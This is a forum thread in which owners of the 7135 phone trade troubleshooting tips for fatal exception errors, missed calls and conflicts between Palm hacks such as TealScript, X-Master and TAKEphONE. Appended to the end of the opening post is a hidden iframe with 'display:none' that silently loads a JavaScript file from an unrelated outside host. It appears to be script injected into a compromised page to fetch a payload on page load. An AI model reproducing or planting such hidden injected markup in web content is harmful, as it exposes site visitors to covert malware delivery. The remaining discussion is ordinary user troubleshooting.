I really love my 7135 phone, except for one big issue. I get fatal exception errors on a fairly regular basis.
Usually, it's just a matter of opening the flip and clicking the "RESET" button on the screen. Then it restarts and works again, *BUT* if I don't notice it crashed, I miss phone calls in the meantime.
The last time it crashed, it completely froze up on me, requiring I press the reset button behind the battery door. After that, I even re-synched the phone with my PC and it seemed to be fine... but it stopped taking incoming calls. I could dial out on it, but it never rang when someone called it.
I probably missed 2 days worth of calls, before finding out it was acting up. (My wife threw a huge fit, accusing me of ignoring all her calls all night long. After I swore I had the phone on the whole time and it never rang, she dialed it and sure enough, it just sat there and did nothing!)
I reset it again with the button in the back, and then it started taking calls again.
I updated the firmware to the latest version, after reading suggestions on this forum about it - but the problem hasn't really gotten any better.
I don't even have many Palm apps loaded on my phone. The main one I use is AvantGo's free client. I'm starting to suspect it might be a major culprit - but it's so useful to me, eliminating it makes the phone much less attractive to own.
Experiences or suggestions, anyone?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Had a similar prob. Call your carrier and get a replacement phone.Your replacement phone will most of the time come with the new upgrade.if it does not DONOT get it upgraded yet as a lot of stores are not following the right processes of upgrade and just about killing a good 7135 phone:anger . For the first two weeks donot add any third party software till the phone side works good and then start adding one by one at a time, probably one prog a day to see which prog causes any or no conflicts!! Hope this helps. I am still in love with the 7135 even though I had to give it up,I cannot tell you why due to reasons that might make me act like a three year old again.:angel

Funny it worked.....the last time!!Now I am not sure what was working before they put a hole in my head!!!!
I was having the same problem, so I took my phone to Verizon and complained. I was expecting them to give me a new phone, but they went ahead and did the upgrade. Since then, the phone has been very stable. I had a problem for a few days that seemed to be a conflict between tealscript and an X-master Hack. But, once I corrected that, no more soft resets or fatal exceptions.
The reply talking about teelescript and and Xmaster hack was really interesting. I have had my 7135 upgraded and have been having more exceptions than before. The difference is that I am now using teelescript. How did you resolve this issue??
Do you have snappermail ? Because this software has cause me more soft and hard resets in the last three weeks than I had in four years of using a palm. So I took it out. also I would like to know about tealscript and X master

I have SnappperMail and X-Master. I had TealScript. I, too, have gotten lots of fatal exception errors. I need to fix this pronto. I'm getting pissed.

Wonder why some people have problems, and others don't. I have SnapperMail Premier edition, TealMaster, and TealScript installed. No problems. My 7135 is running the 44/29 firmware.
I don't know how many hacks the original poster has installed, but I found that some hacks that worked great for years on my VIIx caused general instability in the 7135.
I also recently switch from X-Master to TealMaster (along with TealMemBrain) and have found that stability has improved dramatically.
Generally, I ONLY install one hack at a time and let it run for a few days before installing another one, just to see where a problem may lie.
If you have lots of hacks, consider getting tealmaster, and then ONLY enable one hack at a time and see what happens.

I've only got 1 hack installed and enabled. And it's for TakePhone and it has worked fine for a long time. Can someone shed some light on this "delete saved prefs and unsaved prefs, then restore" trick. What EXACTLY would I need to do.

I believe the intention is to hard reset your device to clear everything out of memory. If by some chance you have a corrupt or orphaned entry in either of the preferences databases, not restoring them after the hard reset would be a good idea. The drawback is that you will have to redo the settings and re-enter registration codes for most of your programs.
Steps:
1) Backup your 7135.
2) Locate the backup directory and delete the "Saved_Preferences.PRC" and "Unsaved_Preferences.PRC" files from that directory.
3) Do a hard reset.
4) Do a restore of the backup (without the above two PRC files) to the 7135.
5) Redo/re-enter settings/reg codes as needed.
6) Use your 7135 as you normally would to check for stability.
went using snappermail on wed and checking mail using QNC network went the mail program was disconecting from the network the 7135 lockup. I did a soft reset the next thing I know the unit did a hard reset and I loss all my data. No other program has done this to me.
Tealscript is causing my hair to fall out, my gums to bleed, and keeps me awake at night trying to fugure out when my palm will crash next.
There is definitely a conflict between Tealscript and some other hack or software that is already on my 7135.
I probobly could figure out where the conflict is if I had the time to re-virginize my phone and add one hack/software at a time. The problem is I don't have the time or patience to do that!
PS - Who the hell decided to make the change to G2? G1 has worked well for years!

G2 was put in place because of a licensing or some other dispute between Palm and the makers of G1. Basically was done to get rid of any potential lawsuits between the two companies, I believe.

I've got nothing but love for Shimon and TAKEphONE but my phone crashes when I use the hack. I don't enable it.

It used to crash, but the ones that have come out since 1.10 have been stable.
You should look at a program called "Crash" (which is no longer a hack). When you Palm crashes, it reboots it automatically. Then I have X-Master set to automatically install the hacks when the phone comes up. So, if they do occur (which is rare), my phone goes through a reboot, and I am set to go.

I haven't really got a handle on it yet. Removing some hacks seems to have helped. But, I've found that when TealScript is running, the phone sometimes crashes during hotsyncs.
Crash is cool and I find Crashlog useful. I might try having my hacks automatically enabled too.
My TAKEphONE hack is 1.24 and I have less crashes with it disabled. Actually, I think it is the Messages & Address apps which have something to do with it.

I agree... I've noticed that I often shortly crash after receiving an SMS message if I select "Go To" in the alert window. But if I just select "OK"(to close the window), and go to the new message via the messages app itself, it seems to crash less.
